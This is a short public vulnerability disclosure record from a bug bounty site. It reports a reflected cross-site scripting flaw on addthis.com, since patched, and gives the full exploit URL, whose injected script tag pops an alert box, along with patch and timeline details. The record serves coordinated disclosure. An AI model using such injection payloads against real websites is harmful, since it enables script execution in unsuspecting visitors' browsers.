addthis.com XSS vulnerability

2014-07-18T10:50:00
ID OBB:46843
Type openbugbounty
Reporter NewLife705
Modified 2014-07-18T10:52:00

Description

Vulnerable URL:
http://www.addthis.com/get/follow-code?style=vs&header=Follow+Us%22%3E%3C/script%3E%3Cscript%3Ealert(%27xssposed%27)%3C/script%3E&uid%255Bfacebook%255D=Thereadynation&uid%255Btwitter%255D=Thereadynation&=uid%255Blinkedin%255D&=uid%255Bgoogle%255D&=uid%255Byoutube%255D&=uid%255Bflickr%255D&=uid%255Bvimeo%255D&=uid%255Bpinterest%255D&=uid%255Binstagram%255D&=uid%255Bfoursquare%255D&=uid%255Btumblr%255D&=uid%255Brss%255D&analytics=0
Details:

Description| Value
---|---
Patched:| Yes, on 06.01.2015
Latest check for patch:| 06.01.2015 12:19 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 189
Google Pagerank| 10
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 18 July, 2014 10:50 GMT
Vulnerability existence verified and confirmed| 18 July, 2014 10:52 GMT